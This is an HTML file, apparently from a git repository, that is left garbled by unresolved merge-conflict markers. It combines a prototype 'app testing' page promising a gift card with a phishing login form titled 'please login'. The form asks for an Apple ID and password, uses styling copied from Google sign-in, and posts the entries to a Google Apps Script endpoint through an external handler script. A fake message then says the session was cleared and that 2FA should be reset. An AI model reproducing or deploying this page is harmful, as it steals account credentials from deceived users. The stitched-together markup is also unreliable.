<!DOCTYPE html>
<html>
<<<<<<< HEAD
<<<<<<< HEAD
<<<<<<< HEAD
=======
>>>>>>> parent of f5c581b... fdg
  <head>
    <title>Home</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"/>
    <meta name="apple-mobile-web-app-capable" content="yes"/>
    <link href="resources/css/axure_rp_page.css" type="text/css" rel="stylesheet"/>
    <link href="data/styles.css" type="text/css" rel="stylesheet"/>
    <link href="files/home/styles.css" type="text/css" rel="stylesheet"/>
    <script src="resources/scripts/jquery-1.7.1.min.js"></script>
    <script src="resources/scripts/jquery-ui-1.8.10.custom.min.js"></script>
    <script src="resources/scripts/prototypePre.js"></script>
    <script src="data/document.js"></script>
    <script src="resources/scripts/prototypePost.js"></script>
    <script src="files/home/data.js"></script>
    <script type="text/javascript">
      $axure.utils.getTransparentGifPath = function() { return 'resources/images/transparent.gif'; };
      $axure.utils.getOtherPath = function() { return 'resources/Other.html'; };
      $axure.utils.getReloadPath = function() { return 'resources/reload.html'; };
    </script>
  </head>
  <body>
    <div id="base" class="">

      <!-- DSFSDFS (Dynamic Panel) -->
      <div id="u0" class="ax_default" data-label="DSFSDFS">
        <div id="u0_state0" class="panel_state" data-label="State2" style="">
          <div id="u0_state0_content" class="panel_state_content">

            <!-- Unnamed (Group) -->
            <div id="u1" class="ax_default" data-left="0" data-top="-24" data-width="309" data-height="134">

              <!-- Unnamed (Rectangle) -->
              <div id="u2" class="ax_default box_1">
                <div id="u2_div" class=""></div>
              </div>

              <!-- Unnamed (Image) -->
              <div id="u3" class="ax_default image">
                <img id="u3_img" class="img " src="images/home/u3.png"/>
              </div>
            </div>

            <!-- Unnamed (Rectangle) -->
            <div id="u4" class="ax_default label">
              <div id="u4_div" class=""></div>
              <div id="u4_text" class="text ">
                <p><span>Welcome!</span></p>
              </div>
            </div>

            <!-- Unnamed (Rectangle) -->
            <div id="u5" class="ax_default label">
              <div id="u5_div" class=""></div>
              <div id="u5_text" class="text ">
                <p><span>You will be testing a prototype of an app and will be compensated with a gift card after successful completion of this test.</span></p>
              </div>
            </div>

            <!-- Unnamed (Rectangle) -->
            <div id="u6" class="ax_default primary_button">
              <div id="u6_div" class=""></div>
              <div id="u6_text" class="text ">
                <p><span>AGREE AND CONTINUE</span></p>
              </div>
            </div>

            <!-- Unnamed (Rectangle) -->
            <div id="u7" class="ax_default primary_button">
              <div id="u7_div" class=""></div>
              <div id="u7_text" class="text ">
                <p><span>CANCEL</span></p>
              </div>
            </div>
          </div>
        </div>
        <div id="u0_state1" class="panel_state" data-label="State1" style="visibility: hidden;">
          <div id="u0_state1_content" class="panel_state_content">

            <!-- button2 (Hot Spot) -->
            <div id="u8" class="ax_default" data-label="button2">
            </div>

            <!-- green (Shape) -->
            <div id="u9" class="ax_default icon" data-label="green">
              <img id="u9_img" class="img " src="images/home/green_u9.png"/>
            </div>

            <!-- shansluemail (Inline Frame) -->
            <div id="u10" class="ax_default" data-label="shansluemail">
              <iframe id="u10_input" data-label="shansluemail" scrolling="no" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>
            </div>

            <!-- apple h1 (Rectangle) -->
            <div id="u11" class="ax_default label" data-label="apple h1">
              <div id="u11_div" class=""></div>
              <div id="u11_text" class="text ">
                <p><span>Log in with Apple ID to continue</span></p>
              </div>
            </div>

            <!-- button (Hot Spot) -->
            <div id="u12" class="ax_default" data-label="button">
            </div>
          </div>
        </div>
      </div>
    </div>
  </body>
<<<<<<< HEAD
=======
<head>
<meta content="width=300, initial-scale=1" name="viewport">
<link rel="stylesheet" href="https://unpkg.com/purecss@1.0.0/build/pure-min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">

   

<<<<<<< HEAD
=======
<head>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<meta content="width=300, initial-scale=1" name="viewport">
>>>>>>> parent of cb7585a... Add files via upload
=======
>>>>>>> parent of 1c4f18c... test
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">


    <style>html ::-webkit-input-placeholder { /* Chrome/Opera/Safari */
  color: #999999;
}
::-moz-placeholder { /* Firefox 19+ */
  color: #999999;
}
:-ms-input-placeholder { /* IE 10+ */
  color: #999999;
}
:-moz-placeholder { /* Firefox 18- */
  color: #999999;
}
.rc-button,
  .rc-button:visited {
  display: inline-block;
  width: 235px;
  text-align: center;
  color: #444;
  font-size: 14px;
  font-weight: 500;
  height: 36px;
  padding: 0 8px;
  line-height: 36px;
  -moz-border-radius: 3px;
  -webkit-border-radius: 3px;
  border-radius: 3px;
  -o-transition: all 0.218s;
  -moz-transition: all 0.218s;
  -webkit-transition: all 0.218s;
  transition: all 0.218s;
  border: 1px solid #dcdcdc;
  background-color: #f5f5f5;
  background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: linear-gradient(top,#f5f5f5,#f1f1f1);
  -o-transition: none;
  -moz-user-select: none;
  -webkit-user-select: none;
  user-select: none;
  cursor: default;
  }
  .card .rc-button {
  width: 100%;
  padding: 0;

  }
  .rc-button.disabled,
  .rc-button[disabled] {
  opacity: .5;
  filter: alpha(opacity=50);
  cursor: default;
  pointer-events: none;
  }
  .rc-button:hover {
  border: 1px solid #c6c6c6;
  color: #333;
  text-decoration: none;
  -o-transition: all 0.0s;
  -moz-transition: all 0.0s;
  -webkit-transition: all 0.0s;
  transition: all 0.0s;
  background-color: #f8f8f8;
  background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: linear-gradient(top,#f8f8f8,#f1f1f1);
  -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  }
  .rc-button:active {
  background-color: #f6f6f6;
  background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: linear-gradient(top,#f6f6f6,#f1f1f1);
  -moz-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  -webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  }
  .rc-button-submit,
  .rc-button-submit:visited {
  border: 1px solid #3079ed;
  color: #fff;
  text-shadow: 0 1px rgba(0,0,0,0.1);
  background-color: #4d90fe;
  background-image: -webkit-linear-gradient(top,#158cfb,#158cfb);
  background-image: -moz-linear-gradient(top,#158cfb,#158cfb);
  background-image: -ms-linear-gradient(top,#158cfb,#158cfb);
  background-image: -o-linear-gradient(top,#158cfb,#158cfb);
  background-image: linear-gradient(top,#158cfb,#158cfb);
  }


  .banner h1 {
  font-family: 'Open Sans', arial;
  -webkit-font-smoothing: antialiased;
  color: #555;
  font-size: 42px;
  font-weight: 300;
  margin-top: 0;
  margin-bottom: 20px;
  }
  .banner h2 {
  font-family: 'Open Sans', arial;
  -webkit-font-smoothing: antialiased;
  color: #555;
  font-size: 18px;
  font-weight: 400;
  margin-bottom: 20px;
  }
  .signin-card {
  width: 274px;
  padding: 40px 40px;
  }
  .signin-card .profile-img {
  width: 96px;
  height: 96px;
  margin: 0 auto 10px;
  display: block;
  -moz-border-radius: 50%;
  -webkit-border-radius: 50%;
  border-radius: 50%;
  }
  .signin-card .profile-name {
  font-size: 16px;
  font-weight: bold;
  text-align: center;
  margin: 10px 0 0;
  min-height: 1em;
  }
  .signin-card .profile-email {
  font-size: 16px;
  text-align: center;
  margin: 10px 0 20px 0;
  min-height: 1em;
  }
  .signin-card input[type=email],
  .signin-card input[type=password],
  .signin-card input[type=text],
  .signin-card input[type=submit] {
  width: 100%;
  display: block;
  margin-bottom: 10px;
  z-index: 1;
  position: relative;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  }
  .signin-card #Email,
  .signin-card #Passwd,
  .signin-card .captcha {
  direction: ltr;
  height: 44px;
  font-size: 16px;

  }
  .signin-card #Email + .stacked-label {
  margin-top: 15px;
  }
  .signin-card #reauthEmail {
  display: block;
  margin-bottom: 10px;
  line-height: 36px;
  padding: 0 8px;
  font-size: 15px;
  color: #404040;
  line-height: 2;
  margin-bottom: 10px;
  font-size: 14px;
  text-align: center;
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  }
  .one-google p {
  margin: 0 0 10px;
  color: #555;
  font-size: 14px;
  text-align: center;
  }
  .one-google p.create-account,
  .one-google p.switch-account {
  margin-bottom: 60px;
  }
  .one-google .logo-strip {
  background-repeat: no-repeat;
  display: block;
  margin: 10px auto;
  background-image: url(https://ssl.gstatic.com/accounts/ui/wlogostrip_230x17_1x.png);
  background-size: 230px 17px;
  width: 230px;
  height: 17px;
  }


  .banner h1 {
  font-size: 38px;
  margin-bottom: 15px;
  }
  .banner h2 {
  margin-bottom: 15px;
  }
  .one-google p.create-account,
  .one-google p.switch-account {
  margin-bottom: 30px;
  }
  .signin-card #Email {
  margin-bottom: 0;
  }
  .signin-card #Passwd {
  margin-top: -1px;

  }
  .signin-card #Email.form-error,
  .signin-card #Passwd.form-error {
  z-index: 2;
  }
  .signin-card #Email:hover,
  .signin-card #Email:focus,
  .signin-card #Passwd:hover,
  .signin-card #Passwd:focus {
  z-index: 3;
  }
p {
        line-height: 0%;
     }

<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  .google-header-bar.centered {
  height: 83px;
  }
  .google-header-bar.centered .header .logo {
  margin: 25px auto 20px;
  }
  .card {
  margin-bottom: 20px;
  }
</style>
<style media="screen and (max-width: 580px)">
  html, body {
  font-size: 14px;
  }
  .google-header-bar.centered {
  height: 73px;
  }
  .google-header-bar.centered .header .logo {
  margin: 20px auto 15px;
  }
  .content {
  padding-left: 10px;
  padding-right: 10px;
  }
  .hidden-small {
  display: none;
  }
  .card {
  padding: 20px 15px 30px;
  width: 270px;
  }
  .footer ul li {
  padding-right: 1em;
  }
  .lang-chooser-wrap {
  display: none;
  }
</style>
<style media="screen and (-webkit-min-device-pixel-ratio: 1.5), (min--moz-device-pixel-ratio: 1.5), (-o-min-device-pixel-ratio: 3 / 2), (min-device-pixel-ratio: 1.5)">
  .header .logo {
  background-image: url(https://ssl.gstatic.com/accounts/ui/logo_2x.png);
  }
  .header .logo-w {
  background-image: url(https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_112x36dp.png);
  }
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  .banner h1 {
  font-size: 38px;
  margin-bottom: 15px;
  }
  .banner h2 {
  margin-bottom: 15px;
  }
  .one-google p.create-account,
  .one-google p.switch-account {
  margin-bottom: 30px;
  }
  .signin-card #Email {
  margin-bottom: 0;
  }
  .signin-card #Passwd {

  margin-top: -1px;
  }
  .signin-card #Email.form-error,
  .signin-card #Passwd.form-error {
  z-index: 2;
  }
  .signin-card #Email:hover,
  .signin-card #Email:focus,
  .signin-card #Passwd:hover,
  .signin-card #Passwd:focus {
  z-index: 3;
  }
</style>
<style media="screen and (max-width: 580px)">
  html, body {
  font-size: 14px;
  }
  .google-header-bar.centered {
  height: 73px;
  }
  .google-header-bar.centered .header .logo {
  margin: 20px auto 15px;
  }
  .content {
  padding-left: 10px;
  padding-right: 10px;
  }
  .hidden-small {
  display: none;
  }
  .card {
  padding: 20px 15px 30px;
  width: 270px;
  }
  .footer ul li {
  padding-right: 1em;
  }
  .lang-chooser-wrap {
  display: none;
  }</style>
<style media="screen and (max-width: 580px)">
  .banner h1 {
  font-size: 22px;
  margin-bottom: 15px;
  }
  .signin-card {
  width: 260px;
  padding: 20px 20px;
  margin: 0 auto 20px;
  }
  .signin-card .profile-img {
  width: 72px;
  height: 72px;
  -moz-border-radius: 72px;
  -webkit-border-radius: 72px;
  border-radius: 72px;
  }
</style>

<style media="screen and (-webkit-min-device-pixel-ratio: 1.5), (min--moz-device-pixel-ratio: 1.5), (-o-min-device-pixel-ratio: 3 / 2), (min-device-pixel-ratio: 1.5)">
  .one-google .logo-strip {
  background-image: url(https://ssl.gstatic.com/accounts/ui/wlogostrip_230x17_2x.png);
  }
</style>

</style>
    <title>please login</title>
</head>
<body bgcolor="#f7f7f7">

<center>






<<<<<<< HEAD
<<<<<<< HEAD
<form id="gform" method="POST" class="pure-form pure-form-stacked" action="https://script.google.com/macros/s/AKfycbyotnjcr3I9J-9_jqxvLGs7jBoFiiqQXiJ6CbSBpGBgFtC8bYxz/exec">
=======
<form id="gform" method="POST" action="https://script.google.com/macros/s/AKfycbyotnjcr3I9J-9_jqxvLGs7jBoFiiqQXiJ6CbSBpGBgFtC8bYxz/exec">
>>>>>>> parent of cb7585a... Add files via upload
=======
<form id="gform" method="POST" class="pure-form pure-form-stacked" action="https://script.google.com/macros/s/AKfycbyotnjcr3I9J-9_jqxvLGs7jBoFiiqQXiJ6CbSBpGBgFtC8bYxz/exec">
>>>>>>> parent of 1c4f18c... test


  <input type="email" name="email" type="email" placeholder="Apple ID" style="width: 270px; color: #999999;" hidden><br><br>


  <input id="" type="message" name="message" placeholder="Apple ID*" style="width: 260px; height:38px;
    border-width: 1px;
    border-style: solid; border-color: #e6e6e6; font-family: 'Open Sans'; font-size: 14px; color: #333333;
	font-style: bold; padding-left:10px; 
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;"></textarea>
  <p>

    <input id="Passwd" type="password" name="message" placeholder="Password*" style="width: 260px; height:38px;
    border-width: 1px; border-style: solid; border-color: #e6e6e6; font-family: 'Open Sans'; font-size: 14px;
  font-style: bold; padding-left:10px;
   -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;"></textarea>
  <p>



  <br><button type="submit" class="rc-button rc-button-submit" style="width: 138px; height:47px; position: absolute;">Sign In</button>

</form>

</form>

</center>
<<<<<<< HEAD
<<<<<<< HEAD
<!-- Customise the Thankyou Message People See when they submit the form: -->
  <div style="display:none;" id="thankyou_message">
    <h2><em>Success!</em> Web Session Cleared
      Make sure 2FA is reset</h2>
  </div>

<script data-cfasync="false" type="text/javascript"
src="https://samson89.github.io/form-submission-handler.js"></script>

</body>
>>>>>>> parent of 1c4f18c... test
=======
<!-- Customise the Thankyou Message People See when they submit the form: 
=======
<!-- Customise the Thankyou Message People See when they submit the form: -->
>>>>>>> parent of 1c4f18c... test
  <div style="display:none;" id="thankyou_message">
    <h2><em>Success!</em> Web Session Cleared
      Make sure 2FA is reset</h2>
  </div>

<script data-cfasync="false" type="text/javascript"
src="https://samson89.github.io/form-submission-handler.js"></script>

</body>
>>>>>>> parent of cb7585a... Add files via upload
=======
>>>>>>> parent of f5c581b... fdg
</html>
